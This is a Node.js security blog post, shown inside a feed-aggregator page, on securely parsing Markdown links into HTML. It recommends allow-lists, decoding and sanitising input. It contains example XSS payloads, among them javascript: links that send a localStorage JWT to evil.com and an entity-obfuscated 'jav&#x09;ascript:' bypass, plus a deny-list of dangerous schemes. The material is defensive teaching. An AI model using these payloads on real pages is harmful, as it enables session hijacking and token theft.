惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

F
Full Disclosure
WordPress大学
WordPress大学
小众软件
小众软件
Cloudbric
Cloudbric
AWS News Blog
AWS News Blog
腾讯CDC
量子位
人人都是产品经理
人人都是产品经理
大猫的无限游戏
大猫的无限游戏
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
Vulnerabilities – Threatpost
Scott Helme
Scott Helme
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
C
CXSECURITY Database RSS Feed - CXSecurity.com
The Hacker News
The Hacker News
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
IT之家
IT之家
Jina AI
Jina AI
Attack and Defense Labs
Attack and Defense Labs
S
SegmentFault 最新的问题
Simon Willison's Weblog
Simon Willison's Weblog
The Cloudflare Blog
阮一峰的网络日志
阮一峰的网络日志
T
Tailwind CSS Blog
Last Week in AI
Last Week in AI
博客园 - 【当耐特】
Google Online Security Blog
Google Online Security Blog
美团技术团队
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
Visual Studio Blog
罗磊的独立博客
L
LINUX DO - 最新话题
博客园 - Franky
博客园 - 叶小钗
Apple Machine Learning Research
Apple Machine Learning Research
The Last Watchdog
The Last Watchdog
J
Java Code Geeks
AI
AI
C
Cisco Blogs
酷 壳 – CoolShell
酷 壳 – CoolShell
C
Cyber Attacks, Cyber Crime and Cyber Security
Cisco Talos Blog
Cisco Talos Blog
博客园 - 三生石上(FineUI控件)
雷峰网
雷峰网
Help Net Security
Help Net Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
云风的 BLOG
云风的 BLOG
I
Intezer
S
Securelist

NodeJS Security & NodeJS Secure Coding's Blog

Hardening Your npm and pnpm Configs in the Age of Shai-Hulud Argument Injection vulnerability in git-blame@1.4.0 Argument Injection vulnerability in `gits@0.1.8` Command Injection vulnerability in `@fab1o/git@1.4.0` Command Injection vulnerability in `git-contributors` via unsanitized CLI arguments Command Injection vulnerability in `git-q@0.0.3` Command injection vulnerability via unsanitized CLI arguments in touxing/fast-git-clone Command Injection vulnerability in `willitmerge@0.2.1` A Directory Traversal Vulnerability I found in Mastra AI Frameworks MCP Server Mastering NPX: A Cheatsheet for npm and Node.js Power Users Mitigate Supply Chain Security with DevContainers and 1Password for Node.js Local Development The Tale of the Vulnerable MCP Database Server Bad Security Defaults in Mastra AI Frameworks Templates SQL Injection and Bypassing "Read-Only" Mode in Xata's MCP Server Security Advisory for qix npm supply-chain compromise affecting debug and billions of weekly download users How to Mitigate SQL Bypass in MCP Servers Enhancing MCP Server Security: A Guide to Using execFile Argument Injection Vulnerability in ggit How to Bypass Access Control in PostgreSQL in Simple PSQL MCP Server for SQL Injection Command Injection Flaws in ggit: Unveiling a Vulnerability Command Injection Vulnerability in Create MCP Server STDIO Tool Exposes System Monitoring Functions GitHub Kanban MCP Server Command Injection Vulnerability Threatens Developer Workflows Critical Command Injection Flaw in iOS Simulator MCP Server Exposes Development Environments Command Injection Vulnerability Discovered in Codehooks MCP Server: A Critical Security Analysis SSRF Shenanigans in safe-axios: Redirects Open the Backdoor SSRF Vulnerability in safe-axios: Unintended Public Address Classification Bypassing SSRF Safeguards in ssrfcheck: A Case of Incomplete Denylists Don't Be Fooled by Multicast, SSRF Bypass in private-ip Node.js Authentication from Lucia to Better Auth Bypassing SSRF Protection in nossrf: When Your Safeguards Become Loopholes Vue CLI Security Fix to Mitigate NPM Binary Planting Node.js API Security Vulnerabilities with Path Traversal in files-bucket-server Will You Accept These GPT 4o Secure Coding Recommendations? Command Injection Vulnerability in interactive-git-checkout npm package An Introduction to SSRF Bypasses and Denylist Failures Disclosing a Command Injection Vulnerability in `git-checkout-tool` Prisma Raw Query Leads to SQL Injection? Yes and No Flawed Git Promises Library on npm Leads to Command Injection Vulnerability Regex Gone Wrong: How parse-duration npm Package Can Crash Your Node.js App How I found an XSS in the Nuxt MDC Library for Markdown Content Holes in the Safety Net: Bypassing SSRF Protection in safe-axios NPM Ignore Scripts Best Practices as Security Mitigation for Malicious Packages Where to find npm vulnerabilities? How to Hunt for IDOR Vulnerabilities To Exploit Security Misconfiguration? How to Avoid JWT Security Mistakes in Node.js Can a Node.js Secure Code Review Find Future Vulnerabilities? The Okta bcrypt Security Incident and The Bun vs Node.js Angle in Secure By Design NodeJS Path Traversal Vulnerability Scanner Do not use secrets in environment variables and here's how to do it better How to use npm audit How to use yarn audit Raw SQL Queries are Actually Better for Security Than ORMs? Node API Security Is Node.js Secure? URL Regex Validation: what can go wrong? Uncovering a Prototype Pollution Regression in the core Node.js project Deno CLI Vulnerability Repeats npm mistakes: CVE-2024-37150 Security skills for JavaScript developers Understanding and Preventing Prototype Pollution in Node.js How to protect against a security breach in React Server Components IDOR Vulnerability: What is it and how to prevent it? The security vulnerability of serving images via a route as opposed to static middleware in Node.js Why is it considered a bad practice to write raw SQL commands? JS Security Concepts for JavaScript Developers Secure Coding Practices in Node.js Against Path Traversal Vulnerabilities Secure JavaScript Coding Practices Against Command Injection Vulnerabilities To IDOR or Not to IDOR: Insecure Direct Object Reference in JavaScript Applications Explained npm vulnerabilities: reviewing the security of your dependencies Disclosing code injection vulnerabilities in safe-eval-2 npm package Introducing Node.js Security Permissions Model, Threat Model, and Security Releases Common Node.js Security Issues and How to Mitigate Them How JavaScript developers should embrace npm security The XZ backdoor CVE-2024-3094: a JavaScript perspective Node.js Security Best Practices The Case for Node.js Secure Configuration Protecting Against Common Node.js Vulnerabilities Input Validation Security Best Practices for Node.js A Node.js Vulnerability Scanner to Avoid Security Risks of EOL Runtime Versions JavaScript Security Issues in Node.js Applications OWASP Node.js Authentication, Authorization and Cryptography Practices OWASP Node.js Best Practices Guide Secure JavaScript Coding to Avoid Insecure Direct Object References (IDOR) North Korea malware on npm and Ledger connect-kit crypto heist 10 Best Practices for Secure Code Review of Node.js code Node.js and OWASP Top Ten Command Injection: Don't Let Your App Go 'BOOM' Secure Code Review Tips to Defend Against Vulnerable Node.js Code Destroyed by Dashes: How Two Hyphens Cause Argument Injection Vulnerability in blamer npm Package Securing Your Node.js Apps by Analyzing Real-World Command Injection Examples An Introduction to Command Injection Vulnerabilities in Node.js and JavaScript
How to Parse URLs from Markdown to HTML Securely?
2025-01-30 · via NodeJS Security & NodeJS Secure Coding's Blog

Initially, this might sound like a simple question: just use the built-in url module in Node.js to parse URLs, right? Or better yet, use the JavaScript URL object via new URL() and go from there to extract the parts you need but this might not be as easy as it seems.

Maybe? Let’s evaluate based on a real-world scenario that I’ve seen done in the wild. Referring specifically to Markdown based libraries.

Markdown to HTML

One of the most popular use-cases that require handling URL parsing is that of when you need to handle Markdown formatted content and render it on a web page, so it needs to be translated into its HTML equivalent.

Actually, this might sound even more popular to you than ever before, due to the rise of LLM (Large Language Models) and the requirement to achieve structured content that gets returned by these generative text models in the response payload and then you need to render them on the page.

To put that use-case example into practical terms, imagine you have the following React component that renders a chat-bot like interface on the page:

return (

<div className="mt-2 flex w-full flex-row items-start justify-start gap-3">

<Flex

ref={messageRef}

direction="col"

gap="lg"

items="start"

className="min-w-0 flex-grow pb-8"

>

<AISelectionProvider onSelect={handleSelection}>

<Mdx

message={rawAI ?? undefined}

animate={!!isLoading}

messageId={id}

/>

</AISelectionProvider>

{stop && (

<AIMessageError

stopReason={stopReason ?? undefined}

message={message}

/>

)}

<AIMessageActions message={message} canRegenerate={message && isLast} />

<AIRelatedQuestions message={message} show={message && isLast} />

</Flex>

</div>

);

Practically, the messages are using a library like marked-react to convert the Markdown syntax from the LLM response into HTML as follows:

return (

<article className={articleClass} id={`message-${messageId}`}>

<Markdown

renderer={{

text: (text) => text,

paragraph: (children) => (

<motion.p

variants={REVEAL_ANIMATION_VARIANTS}

animate={"visible"}

initial={animate ? "hidden" : "visible"}

>

{children}

</motion.p>

),

em: renderEm,

heading: renderHeading,

hr: renderHr,

br: renderBr,

link: (href, text) => renderLink(href, text, messageId),

image: renderImage,

code: renderCode,

codespan: renderCodespan,

}}

openLinksInNewTab={true}

>

{message}

</Markdown>

</article>

);

Parsing Dangerous URLs from Markdown

Ok so we covered the use-case to provide an example of where and why you’ll often need to handle URL parsing from arbitrary strings, be it Markdown or otherwise.

Now imagine how the content from Markdown might look like:

[Click here to visit my website](https://lirantal.com)

Or maybe:

<a href="https://lirantal.com">Click here to visit my website</a>

So what stops someone from crafting a malicious URL that makes use of the javascript: protocol scheme to execute arbitrary JavaScript code, which is exactly how we get to Cross-site Scripting (XSS) vulnerabilities?

Imagine the following XSS payload:

[Click here to visit my website](javascript:alert('XSS'))

A markdown parser might naively turn the URL part word-to-word in terms of intent into the equivalent HTML anchor tag:

<a href="javascript:alert('XSS')">Click here to visit my website</a>

What’s in a JavaScript alert(‘XSS’) ?

Oh, right. This might not seem dangerous at first glance. What’s in an alert pop-up?

But if for example you use JWT to manage authentication and store them in local storage, then this type of an XSS attack can allow exfiltrating the JWT token and hijack the user’s session. Imagine the following:

[Click here to visit my website](javascript:fetch('https://evil.com?token=' + localStorage.getItem('token')))

I wish it was that easy, but it’s not. If you’ve been doing web development for a bit you probably got bitten by this little thing called CORS, which is the devil, but let’s not side-track. CORS is a browser’s security feature that prevents cross-origin requests (requests from one origin (domain) to another, sort of), so the above example won’t work as-is. So not really devil? more like your guardian angel 🪽.

Game not over though, we can come up with JavaScript code that would create an image tag and set the src attribute to the URL we want to exfiltrate the token to:

[Click here to visit my website](javascript:document.body.appendChild(document.createElement('img')).src='https://evil.com?token='+localStorage.getItem('token'))

Slick, eh? :-)

Anyways, I’m digressing here. But I do enjoy showing you and teaching you a bunch of web security tricks!

Parsing a URL in JavaScript

So back to the problem at hand. You get a markdown link element with a URL of javascript:alert() and now what? Well, maybe you pass it to new URL() or maybe you manually parse it with a regex pattern to ensure it doesn’t include invalid protocols like javascript:, right? So you’d have a snippet of code that looks like this:

const unsafeLinkPrefix = [

'javascript:',

'data:text/html',

'vbscript:',

'data:text/javascript',

'data:text/vbscript',

'data:text/css',

'data:text/plain',

'data:text/xml'

]

And then you’ll likely have a function that denies any URLs with those protocol schemes that can turn into an XSS attack. Congrats.

Insecure URL Parsing

But what if I told you that denying protocol schemes like that is not enough? 😲

Imagine user input, or a tricked LLM generated response that includes the following URL:

<a href="jav&#x09;ascript:alert('XSS');">Click Me</a>

This might look odd to you but the browser certainly knows how to interpret it. Your regex pattern matching logic will not catch this attack because it doesn’t strictly match the string “javascript”, right?

What does it do though? Let’s break it down. First of all, the text &#x09; is an HTML entity. Specifically this one, refers to the horizontal tab character. Each of these characters have a meaning:

  • & starts the entity reference.
  • # indicates a numeric character reference.
  • x09 is the hexadecimal Unicode code point for the tab character (equivalent to decimal 9).
  • ; ends the entity reference.

Similarly, there are other payloads that utilize HTML entities to bypass bad regex patterns or just generally insecure pattern matching logic that would allow the URL to be kept as-is, and when it hits the DOM, the browser will easily interpret it as a JavaScript URL.

How to Securely Parse URLs from Markdown

At this point I think we’ve made the point about the dangers of parsing URLs. So to get on with the positive side of things, let’s talk about patterns and security best practices on how to properly and securely address the issue of URL parsing.

The following are built in specific ascending order of the practices you should follow to secure your URL parsing logic:

1. Allow-list vs Deny-list

Development paradigms such as maintaining the unsafeLinkPrefix array are a form of a deny-list and that’s often a bad pattern. The reason is that attackers will always come up with novel ways and new tricks to bypass your deny-list and you on the other hand have to keep up with it and maintain it. It’s a losing battle.

So, instead of having a deny-list that includes javascript: and any other protocols you deem dangerous, change perspectives. Work from an allow-list. What makes it reasonable for you to allow in a URL pattern for it to be valid in your use-cases?

For example, allow only the https: protocol.

2. Use secure anchor tags

When you render the URL as an anchor tag, you can utilize web standards that help enforce hardened security. For example, by default, render all these anchor HTML elements with the attributes rel="noopener noreferrer" and the target="_blank" attribute.

By doing that, the browser will open the URL in a new tab and will not allow the new tab to access the window.opener property, which is a common vector for phishing attacks.

3. Secure by default

This practice I specifically want to devote to library authors.

If you’re maintaining a library or a form of 3rd-party dependency that handles the parsing logic you might say that it is not your responsibility to decide whether URLs are opened in the same browsing tab or a new tab, or whether you should also support the ftp:// protocol scheme.

I get you.

But there’s a lot of value in providing a safe, hardened Secure by default approach that guarantees safe security defaults for the absolute majority of users and then building on top of it a way for consumers to opt-out of these safe defaults and change the behavior to allow for more flexibility. At that point, they hopefully consider the security implications of deviating from the default and then make an informed decision (hopefully 😅).

4. Decode URLs

URLs can be encoded in various ways. For example, the URL https://lirantal.com can be encoded as https%3A%2F%2Flirantal.com. Specifically though, that URL isn’t considered valid for the primary domain. However, since this is an article and I’ve no idea how you are intending to parse URLs then it is also possible that you may have a use-case in which you get URLs from a query string, like say https://example.com?redirect=https%3A%2F%2Flirantal.com and that’s where encoding and decoding URLs comes in handy.

So all that to say, your first step in parsing URLs is to first decode them so that you get a normalized URL representation that you can work with.

In technical terms it means:

const decodedUrl = decodeURIComponent(url);

5. Sanitize HTML entities and control characters

As we’ve seen in the example of the jav&#x09;ascript:alert('XSS'); URL, you should also take into account that URLs can be crafted with some payloads that you wouldn’t expect such as HTML entities.

Other characters might be employing some form of control characters that can be used to bypass your URL parsing logic.

The only way to handle these characters is to match them via string pattern matching (such as a regex) and remove them from the URL before you consider evaluating it.

Following is my recommendation for a practical and secure regular expression to match and remove HTML entities from a URL:

url = url.replace(/&#x([0-9a-f]+);?/gi, '')

.replace(/&#(\d+);?/g, '')

.replace(/&[a-z]+;?/gi, '')

Another variation of the above that you may consider is the following all-in-one regex:

url = url.replace(/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/g, '')

6. Use the URL parser

Finally, pass the URL to the new URL() function and handle error exceptions.

For example, even if you skip the previous step of sanitizing HTML entities and pass the URL as-is to the new URL() function, it will throw an error because the usage of HTML entities in a protocol scheme is invalid:

let exampleBad = 'jav&#10;ascript:alert(4)'

console.log(new URL(ret))

node:internal/url:806

const href = bindingUrl.parse(input, base, raiseException);

^

TypeError: Invalid URL

at new URL (node:internal/url:806:29)

Still, you’d probably want to keep the URL sanitization logic in place and ensure you are also passing it over to the new URL() function to ensure it’s a valid URL and no errors are thrown.

If you do choose to make use of the URL() constructor web API then you probably want to approach this ordered practices list in a different order. Meaning, once you’ve decoded the URL, sanitized it and ran it through new URL() then you can apply the allow-list logic by checking the protocol scheme via the returned object’s url.protocol property.